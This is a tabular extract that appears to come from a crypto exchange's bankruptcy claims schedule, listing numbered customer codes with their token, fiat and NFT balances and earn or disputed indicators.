| 07334479 | | BRZ[1], BTC[.00103584], CUSDT[3], DOGE[3778.73290649], ETH[.0151771], ETHW[.0151771], TRX[77.44034267], USD[150.00] | | |
| 07334480 | | USD[10.00] | | |
| 07334481 | | BRZ[2], CUSDT[5], DOGE[349.1888933], SHIB[1], SOL[0], TRX[5], USD[0.44] | | |
| 07334482 | | USD[10.00] | | |
| 07334483 | | USD[0.05] | | |
| 07334484 | | BRZ[4], CUSDT[10], DOGE[1473.97220834], LINK[.00001638], PAXG[.01781178], SHIB[5], SOL[.00048074], TRX[1666.04753209], USD[2026.51], USDT[54.83674703] | Yes | |
| 07334485 | | BRZ[1], CUSDT[1], DOGE[7007.47822167], ETH[.1647936], ETHW[.1643946], TRX[1], USD[0.00] | Yes | |
| 07334487 | | DOGE[0], LINK[0], SHIB[2], TRX[0], USD[0.00] | Yes | |
| 07334489 | | BRZ[3], CUSDT[2], DOGE[1], SHIB[1], USD[303.84] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334490 | | USD[10.00] | | |
| 07334491 | | USD[0.01], USDT[0] | Yes | |
| 07334492 | | DOGE[1], USD[0.00] | | |
| 07334493 | | BAT[2], BRZ[5], CUSDT[5], TRX[9], USD[0.00] | | |
| 07334494 | | CUSDT[472.13100137], USD[0.00] | | |
| 07334495 | | DOGE[955.10775584], USD[0.00] | | |
| 07334496 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07334497 | | USD[10.00] | | |
| 07334498 | | CUSDT[1], DOGE[.00003917], USD[0.01] | | |
| 07334499 | | USD[0.11] | | |
| 07334500 | | USD[10.00] | | |
| 07334501 | | ETH[.00078881], ETHW[.00077598], USD[0.00], USDT[0] | Yes | |
| 07334503 | | BRZ[4], CUSDT[4], DOGE[0], GRT[1], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07334504 | | BTC[.00103214], CUSDT[2], DOGE[956.00485874], SOL[.02226845], TRX[1], USD[0.05] | Yes | |
| 07334505 | | BAT[3.29408295], BRZ[1], CUSDT[4], TRX[4], USD[0.00] | Yes | |
| 07334506 | | TRX[75.18827615], USD[0.00] | Yes | |
| 07334507 | | DOGE[2349.4957061], TRX[1], USD[0.00] | | |
| 07334508 | | CUSDT[5], DOGE[147.72356481], TRX[1], USD[1.13] | Yes | |
| 07334509 | | USD[10.00] | | |
| 07334510 | | BRZ[1], CUSDT[3], DOGE[59.14812425], TRX[181.25353859], USD[5.93] | | |
| 07334512 | | CUSDT[3], TRX[3], USD[280.62] | | |
| 07334513 | | SHIB[1], USD[0.00] | Yes | |
| 07334514 | | USD[0.02] | | |
| 07334515 | | USD[10.00] | | |
| 07334516 | | BF_POINT[100], SHIB[2], TRX[.000001], USD[0.01], USDT[0.00019867] | Yes | |
| 07334517 | | USD[10.00] | | |
| 07334518 | Contingent, Disputed | TRX[78.24445728], USD[0.00] | | |
| 07334520 | | USD[10.00] | | |
| 07334521 | | USD[10.00] | | |
| 07334524 | | USD[10.00] | | |
| 07334525 | | USD[10.00] | | |
| 07334526 | | BAT[85.18038302], BTC[.00215512], DOGE[8.09236431], SHIB[2], SOL[0], TRX[2], USD[184.76] | Yes | |
| 07334527 | | USD[10.00] | | |
| 07334528 | | USD[10.00] | | |
| 07334529 | | USD[10.00] | | |
| 07334530 | | CUSDT[1], DOGE[18.91433062], USD[0.00] | | |
| 07334531 | | DOGE[1], USD[0.00] | | |
| 07334532 | | DOGE[10284.60598304], USD[0.00] | | |
| 07334534 | | DOGE[1.00002904], USD[0.78] | | |
| 07334535 | | USD[10.00] | | |
| 07334536 | | USD[0.01] | Yes | |
| 07334537 | | USD[10.00] | | |
| 07334538 | | USD[10.00] | | |
| 07334539 | | BRZ[7.40113381], CUSDT[22], DOGE[64349.20389458], ETH[.1939934], ETHW[.19377895], GRT[166.5043383], KSHIB[1308.82017844], LINK[34.43790943], MATIC[220.85907594], SHIB[12553366.45877656], TRX[42502.24457416], USD[-39.90] | Yes | |
| 07334541 | | CUSDT[.90514568], DOGE[.0044715], GRT[1], TRX[1.47992482], USD[0.00] | | |
| 07334542 | | USD[10.00] | | |
| 07334543 | | CUSDT[5], DOGE[1], USD[243.22] | | |
| 07334544 | | USD[0.00] | | |
| 07334545 | | USD[10.00] | | |
| 07334546 | | USD[10.00] | | |
| 07334547 | | USD[10.00] | | |
| 07334549 | | DOGE[0.00644153], ETH[0], GRT[0], SHIB[3], SOL[0], TRX[2], UNI[0], USD[198.30] | Yes | |
| 07334550 | | USD[10.00] | | |
| 07334551 | | BRZ[1], USD[0.01] | | |
| 07334552 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07334553 | | USD[10.00] | | |
| 07334554 | | USD[10.00] | | |
| 07334555 | | CUSDT[2], DAI[.24863773], DOGE[8.79080184], ETH[.02056428], ETHW[.02056428], SOL[.00003857], USD[-10.47] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334556 | | USD[0.00] | | |
| 07334557 | | SOL[.00048245], USD[0.00] | | |
| 07334558 | | USD[10.00] | | |
| 07334559 | | USD[10.00] | | |
| 07334561 | | USD[10.00] | | |
| 07334562 | | USD[10.00] | | |
| 07334563 | | USD[10.00] | | |
| 07334564 | | BRZ[1], BTC[.00614549], CUSDT[3], ETH[1.96672995], ETHW[1.96588594], GRT[1.00367791], TRX[2], USD[0.00] | Yes | |
| 07334565 | | CUSDT[1], DOGE[1], GRT[1.00498957], USD[0.00] | Yes | |
| 07334566 | | BRZ[1], BTC[.00016784], CUSDT[5], DOGE[7.23443893], ETH[.11066237], ETHW[.10956229], GRT[1.10243411], LINK[.00001189], SHIB[2], TRX[6], USD[0.38] | Yes | |
| 07334567 | | BRZ[1], BTC[.00361838], CUSDT[2], DOGE[2.00002018], TRX[2709.49960727], USD[0.00] | | |
| 07334568 | | CUSDT[6], DOGE[1], SOL[11.98372297], USD[0.03] | Yes | |
| 07334569 | | DOGE[0], USD[0.00] | | |
| 07334570 | | CUSDT[1], DOGE[.07384363], USD[0.01] | | |
| 07334571 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07334572 | | ETH[0], USD[2.76] | | |
| 07334574 | | USD[10.00] | | |
| 07334575 | | DOGE[2], TRX[1], USD[0.41] | | |
| 07334576 | | BAT[30.71629366], CAD[13.94], CUSDT[2827.67211487], DAI[21.5708025], DOGE[1650.45193693], SHIB[1632417.47767721], SUSHI[7.52522218], TRX[1275.20755477], USD[0.00] | Yes | |
| 07334578 | | USD[10.00] | | |
| 07334579 | | CUSDT[1], GRT[0], SHIB[3], TRX[1], USD[0.00], USDT[0] | | |
| 07334580 | | SUSHI[.68432752], USD[0.00] | | |
| 07334581 | | USD[10.00] | | |
| 07334582 | | USD[10.00] | | |
| 07334583 | | DOGE[177.50279833], USD[0.00] | | |
| 07334584 | | DOGE[2375.37647222], USD[0.00] | | |
| 07334585 | | USD[10.00] | | |
| 07334586 | | USD[10.00] | | |
| 07334587 | | USD[10.00] | | |
| 07334588 | | USD[10.00] | | |
| 07334589 | | DOGE[1.00001871], USD[0.01] | | |
| 07334590 | | USD[10.00] | | |
| 07334592 | | USD[10.00] | | |
| 07334593 | | CUSDT[2.24425918], DOGE[.00002275], USD[0.01] | Yes | |
| 07334594 | | DOGE[3.05422881], USD[0.00], USDT[0.00000001] | | |
| 07334596 | | USD[10.00] | | |
| 07334597 | | USD[0.00] | | |
| 07334598 | | AVAX[4.46491755], BAT[449.37599537], BF_POINT[200], CUSDT[18], DOGE[8150.14280021], GRT[621.26769491], KSHIB[2290.70042059], LINK[2.22256983], MATIC[793.86384198], SHIB[3874862.62012076], SOL[21.43261199], SUSHI[59.36512508], TRX[6711.15104495], UNI[17.33298339], USD[41.00], USDT[1.10607915] | Yes | |
| 07334599 | | USD[10.00] | | |
| 07334600 | | BTC[.00019611], USD[0.00] | | |
| 07334602 | | BRZ[2], DOGE[.07408955], USD[0.00] | | |
| 07334603 | | USD[10.00] | | |
| 07334604 | | BRZ[1], CUSDT[6], DOGE[8660.36172245], NFT (417905640630736721/The Tulip 1)[1], NFT (422088155995139879/Dreams Forgotten)[1], NFT (488199115878311247/Fancy Frenchies #9383)[1], SHIB[14286796.00295631], SOL[9.4593235], USD[0.00] | Yes | |
| 07334605 | | BRZ[1], DOGE[3], ETHW[.18999063], SHIB[2], TRX[2], USD[0.00], USDT[396.10216261] | | |
| 07334606 | | USD[10.00] | | |
| 07334607 | | USD[10.00] | | |
| 07334608 | | BAT[1], BTC[.00875931], USD[0.00] | | |
| 07334609 | | DOGE[25.87432849], USD[0.00] | | |
| 07334610 | | USD[10.00] | | |
| 07334611 | | CUSDT[1], DOGE[88.9868287], TRX[167.13447742], USD[0.00] | Yes | |
| 07334612 | | BTC[.00017189], DAI[.00000026], USD[0.00] | | |
| 07334613 | | USD[10.00] | | |
| 07334614 | | USD[0.01], USDT[0.00000001] | | |
| 07334615 | | BAT[1], BTC[.00238], ETH[0.06378869], ETHW[0.06378869], USD[10.00] | | |
| 07334616 | | USD[94.06] | | |
| 07334617 | | USD[10.00] | | |
| 07334619 | | BTC[.00036014], CUSDT[2], USD[0.00] | | |
| 07334620 | | TRX[79.62562578], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334621 | | CUSDT[3], DOGE[5.05493844], ETH[0], GRT[88.45696057], LINK[10.85239201], USD[38.58], USDT[0] | | |
| 07334622 | | USD[10.00] | | |
| 07334623 | | USD[10.00] | | |
| 07334625 | | USD[10.00] | | |
| 07334626 | | USD[10.00] | | |
| 07334627 | | USD[10.00] | | |
| 07334628 | | USD[11.07] | Yes | |
| 07334629 | | USD[10.00] | | |
| 07334631 | | USD[10.00] | | |
| 07334632 | | DOGE[13.76356683], USD[0.00] | | |
| 07334633 | | CUSDT[2], DOGE[1], TRX[3], UNI[.00000061], USD[10.00], USDT[0] | | |
| 07334634 | | USD[10.00] | | |
| 07334635 | | USD[10.00] | | |
| 07334636 | | BRZ[1], USD[0.01] | | |
| 07334637 | | DOGE[4], GRT[739.77297608], USD[0.80] | | |
| 07334638 | | USD[10.00] | | |
| 07334639 | | CUSDT[8], DOGE[.00099538], USD[0.00], USDT[0.90866030] | | |
| 07334640 | | USD[10.00] | | |
| 07334641 | | BRZ[1], BTC[0], CUSDT[3], DOGE[3], GRT[0], TRX[2], USD[0.00] | | |
| 07334642 | | USD[0.01] | Yes | |
| 07334643 | | NFT (324751168741168931/Entrance Voucher #29599)[1], USD[0.00], USDT[0] | | |
| 07334644 | | USD[10.00] | | |
| 07334645 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07334646 | | USD[10.00] | | |
| 07334647 | | USD[10.00] | | |
| 07334648 | | DOGE[1.0000458], USD[0.98] | | |
| 07334649 | | USD[10.00] | | |
| 07334650 | | USD[10.00] | | |
| 07334651 | | USD[0.01] | | |
| 07334652 | | USD[10.00] | | |
| 07334653 | | USD[10.00] | | |
| 07334654 | | USD[10.00] | | |
| 07334655 | | USD[10.00] | | |
| 07334656 | | USD[10.00] | | |
| 07334657 | | USD[10.00] | | |
| 07334658 | | USD[10.00] | | |
| 07334659 | | TRX[1], USD[151.51] | Yes | |
| 07334660 | | DOGE[125.99296631], USD[0.00] | | |
| 07334661 | | BRZ[1], CUSDT[1], USD[10.81] | | |
| 07334662 | | CUSDT[1], DOGE[5856.70532617], USD[-23.61] | | |
| 07334663 | | BTC[0], SHIB[2056699.3710523], USD[0.00] | | |
| 07334664 | | USD[10.00] | | |
| 07334665 | | USD[10.00] | | |
| 07334666 | | USD[10.00] | | |
| 07334668 | | USD[20.00] | | |
| 07334669 | | BTC[.00192346], CUSDT[2], DOGE[108.70801069], ETH[0], SHIB[1], USD[7.12] | | |
| 07334670 | | BAT[.79267181], CUSDT[16], ETHW[.04279261], GRT[.33293181], SHIB[63979.99173951], TRX[1.266879], USD[0.00] | Yes | |
| 07334671 | | UNI[.55718008], USD[0.00] | Yes | |
| 07334672 | | CUSDT[2], TRX[223.49354314], USD[0.00] | Yes | |
| 07334673 | | USD[10.00] | | |
| 07334674 | | BTC[0], ETH[0], USD[0.00] | | |
| 07334675 | | USD[10.00] | | |
| 07334676 | | BRZ[.01306302], BTC[.00000015], CUSDT[2], DOGE[.00008889], SOL[.22745585], USD[0.00] | Yes | |
| 07334677 | | CUSDT[1], DOGE[2549.80278741], SHIB[1618965.01879155], TRX[1], USD[0.32] | | |
| 07334678 | | USD[10.00] | | |
| 07334679 | | CUSDT[5], DOGE[92.84330732], ETH[.00058639], ETHW[.00058639], LTC[.00689036], USD[0.60] | | |
| 07334680 | | CUSDT[1], DOGE[148.60644445], USD[1.00] | Yes | |
| 07334681 | | USD[10.94] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334682 | | USD[10.00] | | |
| 07334683 | | BTC[.0002994], ETHW[1.052946], LINK[16.953], MATIC[1462.7195], SHIB[.00000001], USD[12.98], USDT[0] | | |
| 07334685 | | USD[10.00] | | |
| 07334686 | | USD[10.00] | | |
| 07334687 | | USD[10.00] | | |
| 07334688 | | USD[5.00] | | |
| 07334689 | | ETH[0.00003388], ETHW[0.00003388], USD[0.00] | | |
| 07334690 | | MATIC[1.00000913], TRX[1], USD[0.01] | | |
| 07334691 | | CUSDT[2], DOGE[222.30563046], TRX[1], USD[0.13] | Yes | |
| 07334692 | | USD[10.00] | | |
| 07334693 | | BRZ[1], DOGE[3235.52429028], USD[0.00] | | |
| 07334694 | | DOGE[5], USD[0.01] | | |
| 07334695 | | USD[10.00] | | |
| 07334696 | | USD[10.00] | | |
| 07334697 | | BTC[.00019022], CUSDT[1], DOGE[965.26392636], USD[0.00] | Yes | |
| 07334698 | | USD[10.00] | | |
| 07334699 | | USD[10.00] | | |
| 07334700 | | USD[0.00] | | |
| 07334701 | | BF_POINT[300], BRZ[4], CUSDT[14], DOGE[328.06816379], SHIB[2971059.33287871], TRX[10], USD[0.00], USDT[0] | | |
| 07334702 | | CUSDT[1], DOGE[643.22432304], USD[0.01] | | |
| 07334703 | | USD[10.00] | | |
| 07334704 | | BRZ[5.06020315], CUSDT[6], DOGE[3.00043361], NFT (319016470031443396/ALPHA:RONIN #805)[1], NFT (365378008220478155/ALPHA:RONIN #958)[1], NFT (424356715863792802/DRIP NFT)[1], NFT (428179261283364518/Cyber Pharmacist 0908)[1], NFT (440514327263043596/SOLYETIS #7226)[1], NFT (440581008479399069/ALPHA:RONIN #763)[1], NFT (447657587741460490/ALPHA:RONIN #705)[1], NFT (450240499731187913/Astral Apes #2175)[1], NFT (467401910466877291/Oink 2114)[1], NFT (488850072549466289/Cyber Pharmacist 4050)[1], NFT (493815151599658871/Cyber Pharmacist 4173)[1], NFT (514531641651370355/ALPHA:RONIN #1017)[1], NFT (539806649485413183/ApexDucks #3783)[1], NFT (543023504335211664/Space Bums #0605)[1], NFT (546797427551896227/ALPHA:RONIN #573)[1], NFT (561809535037883190/ALPHA:RONIN #665)[1], NFT (569790402564123051/SOLYETIS #5964)[1], SHIB[2], SOL[394.77616449], TRX[6.04067628], USD[0.82] | Yes | |
| 07334705 | | CUSDT[2], TRX[3], USD[0.01], USDT[0] | | |
| 07334706 | | CUSDT[1], DOGE[2838.34490431], USD[0.00] | | |
| 07334707 | | USD[10.00] | | |
| 07334708 | | USD[10.00] | | |
| 07334709 | | USD[10.00] | | |
| 07334710 | | USD[10.00] | | |
| 07334711 | | BTC[.00019182], CUSDT[2], DOGE[323.5144461], ETH[.02039531], ETHW[.02014164], LINK[1.22164866], SOL[.2397324], SUSHI[3.22650704], USD[0.00] | Yes | |
| 07334712 | | DOGE[0], USD[0.95], USDT[0] | | |
| 07334714 | | USD[10.00] | | |
| 07334715 | | USD[0.01], USDT[0] | | |
| 07334716 | | ETH[.00559506], ETHW[.00559506], USD[0.00] | | |
| 07334717 | | USD[10.00] | | |
| 07334718 | | DOGE[1.00056675], USD[0.00] | | |
| 07334719 | | USD[10.00] | | |
| 07334720 | | USD[10.00] | | |
| 07334721 | | USD[10.00] | | |
| 07334722 | | USD[10.00] | | |
| 07334723 | | BTC[.00005914], USD[0.00] | | |
| 07334725 | | BAT[1], BTC[.00021413], CUSDT[2], GRT[1], TRX[6], USD[0.00] | | |
| 07334726 | | USD[10.78] | Yes | |
| 07334727 | | ALGO[275.03706833], AVAX[8.15500082], BCH[.00000195], BF_POINT[300], ETHW[.06709749], LINK[191.00325802], LTC[0], SHIB[297], SOL[.37519119], TRX[548.37289439], UNI[39.39220782], USD[0.04], YFI[.00000038] | Yes | |
| 07334728 | | DOGE[25.79193957], USD[0.00] | | |
| 07334729 | | USD[10.00] | | |
| 07334730 | | BRZ[1], CUSDT[10], DOGE[0], USD[0.00] | | |
| 07334731 | | CUSDT[1], DOGE[2.04922027], TRX[1], USD[0.01] | | |
| 07334732 | | BTC[0], CUSDT[3], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07334733 | | USD[10.00] | | |
| 07334734 | | DOGE[1128.98315575], USD[0.00] | | |
| 07334735 | | USD[10.00] | | |
| 07334736 | | USD[10.00] | | |
| 07334737 | | DOGE[.15534564], TRX[2], USD[0.04] | | |
| 07334738 | | DOGE[13950.81416226], USD[0.01] | Yes | |
| 07334739 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334741 | | BTC[0], USD[0.00] | | |
| 07334742 | | BRZ[2], CUSDT[2], TRX[1713.03486567], USD[0.01] | Yes | |
| 07334743 | | USD[10.00] | | |
| 07334745 | | CUSDT[1], DOGE[1], ETH[.00446307], ETHW[.00446307], GRT[1], USD[0.00] | | |
| 07334746 | | BTC[.00000001], SHIB[4.04581241], TRX[.00262608], USD[0.01] | Yes | |
| 07334747 | | DOGE[43.84418614], GBP[0.00], SOL[0], USD[0.00] | Yes | |
| 07334748 | | USD[0.00] | | |
| 07334749 | | USD[10.00] | | |
| 07334750 | | USD[10.00] | | |
| 07334751 | | USD[10.00] | | |
| 07334752 | | USD[11.00] | Yes | |
| 07334753 | | DOGE[1], USD[10.00] | | |
| 07334754 | | USD[10.00] | | |
| 07334755 | | USD[10.00] | | |
| 07334756 | | USD[10.00] | | |
| 07334757 | | USD[0.01] | | |
| 07334758 | | CUSDT[2], USD[0.01] | | |
| 07334759 | | CUSDT[4], DOGE[148.33090027], TRX[47.38184195], USD[9.85] | | |
| 07334760 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07334761 | | USD[0.00] | | |
| 07334762 | | BRZ[1], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07334763 | | NFT (296306894074534562/Entrance Voucher #25647)[1], NFT (387661674599564422/Imola Ticket Stub #753)[1], SHIB[775.50210392], TRX[1], USD[0.00], USDT[0] | | |
| 07334764 | | DOGE[105.23426292], USD[0.00] | | |
| 07334765 | | CUSDT[6], DOGE[.77574272], ETH[1.08468225], ETHW[1.08422677], SHIB[3069672.63210855], TRX[5], USD[0.01] | Yes | |
| 07334766 | | USD[10.00] | | |
| 07334767 | | USD[10.00] | | |
| 07334768 | | USD[10.00] | | |
| 07334769 | | DOGE[2871.03049003], ETH[.45248788], ETHW[.45248788], TRX[5030.4228369], USD[792.12] | | |
| 07334770 | | USD[10.00] | | |
| 07334771 | | USD[10.00] | | |
| 07334772 | | CUSDT[2], DOGE[1076.98328478], USD[5.76] | Yes | |
| 07334773 | | BRZ[3], CUSDT[10], GRT[1], TRX[4], USD[0.01] | | |
| 07334774 | | DOGE[31.7426346], GRT[.01729901], USD[0.29] | Yes | |
| 07334775 | | DOGE[1], GRT[4.07713076], USD[0.00] | | |
| 07334776 | | BRZ[1], CUSDT[3], DOGE[5178.60660697], TRX[3], USD[0.00] | | |
| 07334777 | | USD[10.00] | | |
| 07334778 | | USD[166.42] | | |
| 07334779 | | USD[10.00] | | |
| 07334780 | | USD[10.00] | | |
| 07334781 | | DOGE[1], USD[0.01] | Yes | |
| 07334782 | | USD[10.00] | | |
| 07334783 | | DOGE[25.85974939], USD[0.00] | | |
| 07334784 | | USD[0.01] | | |
| 07334785 | | USD[10.00] | | |
| 07334786 | | DOGE[6794.0982231], USD[10.00] | | |
| 07334787 | | USD[10.00] | | |
| 07334788 | | USD[10.00] | | |
| 07334789 | | BAT[2.12750574], BRZ[14.35663086], BTC[.00000018], CUSDT[33], DOGE[17.36861381], GRT[1.00476963], LTC[0], PAXG[0], SHIB[2], SOL[0.00176358], SUSHI[0], TRX[25.35659999], USD[0.04], USDT[0.00000126] | Yes | |
| 07334790 | | BRZ[1], SHIB[96572.38640571], TRX[.13746279], USD[0.00], USDT[0] | Yes | |
| 07334792 | | BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07334793 | | BAT[1.01233065], BRZ[2], CUSDT[2], DOGE[143497.20189553], GRT[1.00360317], TRX[5], USD[0.00] | Yes | |
| 07334796 | | TRX[2], USD[0.01] | | |
| 07334797 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07334798 | | ETH[.00306913], ETHW[.00306913], USD[0.00] | | |
| 07334799 | | CUSDT[1], DOGE[384.88943026], TRX[2], USD[0.01] | | |
| 07334800 | | BRZ[2], CUSDT[7], TRX[1], USD[0.01] | | |
| 07334801 | | USD[10.00] | | |
| 07334802 | | BRZ[4], BTC[0], CUSDT[4], DOGE[0], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334803 | | USD[10.00] | | |
| 07334804 | | BRZ[2], CUSDT[5], DOGE[3.1530676], TRX[12], USD[0.00], USDT[0.00086318] | | |
| 07334805 | | CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07334807 | | USD[10.00] | | |
| 07334808 | | CUSDT[5], DOGE[1.07415567], TRX[1], USD[0.00] | | |
| 07334809 | | USD[10.00] | | |
| 07334810 | | BTC[.00160418], CUSDT[1], USD[0.00] | | |
| 07334811 | | USD[0.00] | | |
| 07334812 | | USD[10.00] | | |
| 07334813 | | USD[10.00] | | |
| 07334815 | | BTC[.00013557], CUSDT[1], ETH[.00131356], ETHW[.00131356], SHIB[278209.56780457], USD[0.00] | | |
| 07334816 | | USD[10.00] | | |
| 07334817 | | USD[0.00] | | |
| 07334818 | | USD[0.00] | | |
| 07334819 | | BTC[.00000006], DOGE[.00674598], ETH[.00000035], ETHW[.00000035], USD[0.00], WBTC[.00000004] | Yes | |
| 07334820 | | CUSDT[1], DOGE[.07707287], TRX[1], USD[6.11] | | |
| 07334821 | | DOGE[305.67326523], USD[10.00] | | |
| 07334822 | | USD[10.00] | | |
| 07334823 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07334824 | | DOGE[581.22515101], ETH[.06681515], ETHW[.06681515], USD[0.00] | | |
| 07334825 | | USD[10.00] | | |
| 07334826 | | USD[10.00] | | |
| 07334827 | | USD[10.00] | | |
| 07334828 | | USD[10.00] | | |
| 07334829 | | DOGE[1.00004541], TRX[1], USD[0.00] | | |
| 07334830 | | BRZ[3], BTC[.00000006], CUSDT[5], DOGE[.00015115], TRX[1], USD[3.45], USDT[8.92825114] | | |
| 07334832 | | USD[10.00] | | |
| 07334833 | | USD[10.00] | | |
| 07334834 | | USD[10.00] | | |
| 07334835 | | BTC[0], USD[0.01], USDT[0] | | |
| 07334836 | | BRZ[0.00000006], CUSDT[1], DOGE[1.00003512], LINK[0.00000011], LTC[0], SOL[0.00006078], TRX[1.00015906], USD[0.00] | | |
| 07334837 | | CUSDT[4], DOGE[.00007134], USD[0.00] | | |
| 07334838 | | DOGE[197.44065252], LTC[.07568115], USD[0.00] | | |
| 07334839 | | TRX[1], USD[36.13] | Yes | |
| 07334840 | | USD[10.00] | | |
| 07334841 | | CUSDT[1], DOGE[26.26420471], TRX[1], USD[0.00] | | |
| 07334842 | | BAT[36.59113543], BRZ[5.07952967], BTC[.00392315], CUSDT[21], DOGE[6194.52247788], ETH[.40033021], ETHW[.40016202], GRT[188.0743972], LTC[.53748081], MATIC[126.35569787], SHIB[7543949.44317791], SOL[17.87132943], SUSHI[5.51937448], TRX[923.21085060], UNI[2.93293736], USD[7.211, USDT[1.10999515] | Yes | |
| 07334843 | | DOGE[.00003105], TRX[1], USD[0.00] | | |
| 07334844 | | CUSDT[6], DOGE[35.37827328], NFT (325273757492678496/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #61)[1], NFT (391239466580306225/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #61)[1], NFT (435524588217869306/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #42)[1], NFT (520920691663339617/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #65)[1], SHIB[1], USD[0.00] | Yes | |
| 07334845 | | SHIB[758897.39352136], USD[0.01] | | |
| 07334847 | | BTC[0.00001860], CUSDT[4.00001118], SHIB[12468.82793017], TRX[1.03049075], USD[0.00] | Yes | |
| 07334848 | | USD[10.00] | | |
| 07334849 | | USD[10.00] | | |
| 07334850 | | DOGE[23.21254933], USD[6.51] | Yes | |
| 07334851 | | USD[10.00] | | |
| 07334852 | | USD[0.00] | | |
| 07334853 | | USD[10.00] | | |
| 07334854 | | CUSDT[4], DOGE[1138.56788933], SHIB[1], USD[0.00] | | |
| 07334855 | | BTC[.00020666], CUSDT[6], DOGE[1031.70465799], ETH[.04865607], ETHW[.04865607], SOL[1.10116313], TRX[258.17735365], USD[0.54] | | |
| 07334856 | | DOGE[1908.34208763], USD[10.00] | Yes | |
| 07334857 | | DOGE[537.52149797], TRX[624.01133204], USD[0.00] | | |
| 07334858 | | BRZ[1], CUSDT[1], DOGE[1.00003495], USD[42.25] | Yes | |
| 07334860 | | USD[0.00] | | |
| 07334861 | | BRZ[0], BTC[0], TRX[.99960195], USD[0.00] | | |
| 07334862 | | BRZ[4], CUSDT[4], TRX[3], USD[0.01] | | |
| 07334863 | | USD[0.00] | | |
| 07334864 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334865 | | USD[0.00] | | |
| 07334866 | | BRZ[2], BTC[0], CUSDT[3], DOGE[7], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07334867 | | USD[10.00] | | |
| 07334868 | | USD[10.00] | | |
| 07334869 | | USD[10.00] | | |
| 07334870 | | BTC[0], DOGE[2], ETH[0], GRT[0], USD[0.00] | | |
| 07334871 | | USD[10.00] | | |
| 07334872 | | BRZ[3], CUSDT[8], DOGE[4], SHIB[1], TRX[3], USD[0.33] | | |
| 07334873 | | USD[10.00] | | |
| 07334874 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07334875 | | CUSDT[.91980137], USD[0.18] | | |
| 07334876 | | BCH[.00000001], CUSDT[7], USD[0.41] | | |
| 07334877 | | LINK[0], USD[0.00], USDT[0] | | |
| 07334878 | | DOGE[3712.55241253], USD[0.00], USDT[0] | | |
| 07334880 | | DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07334881 | | USD[10.00] | | |
| 07334882 | | USD[0.00] | | |
| 07334883 | | BRZ[1], BTC[.01893644], CUSDT[2], DOGE[7308.74219418], USD[0.00] | | |
| 07334884 | | USD[10.00] | | |
| 07334885 | | USD[0.00] | | |
| 07334888 | | USD[10.00] | | |
| 07334889 | | BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07334890 | | USD[10.00] | | |
| 07334891 | | DOGE[206.86865398], USD[14.37] | | |
| 07334892 | | USD[10.00] | | |
| 07334893 | | BCH[.00007459], CUSDT[1], DOGE[.0066896], SHIB[1], USD[26.35] | | |
| 07334894 | | USD[10.00] | | |
| 07334895 | | USD[10.00] | | |
| 07334897 | | USD[10.00] | | |
| 07334898 | | BCH[0], DOGE[2.07779867], TRX[1], USD[0.18] | | |
| 07334899 | | CUSDT[19], DOGE[1], ETH[.00000001], TRX[3], USD[0.00] | | |
| 07334900 | | USD[10.00] | | |
| 07334902 | | BAT[2], BRZ[2], BTC[0], CUSDT[3], DAI[0], DOGE[2], USD[0.00], USDT[1] | | |
| 07334904 | | CUSDT[1], DOGE[1360.0500624], USD[0.02] | | |
| 07334905 | | USD[10.00] | | |
| 07334906 | | USD[10.00] | | |
| 07334907 | | CUSDT[3], DOGE[1762.31912382], GRT[1.00367791], USD[2.12] | Yes | |
| 07334909 | | DOGE[27.26400576], USD[0.00] | | |
| 07334910 | | CUSDT[1], DOGE[5733.19493847], USD[0.00] | Yes | |
| 07334911 | | CUSDT[2], DOGE[289.65301634], ETH[.0001389], ETHW[.0001389], USD[0.00], USDT[0] | Yes | |
| 07334912 | | BRZ[1], CUSDT[3], DOGE[1], GRT[1], TRX[1], USD[0.01] | | |
| 07334913 | | USD[10.00] | | |
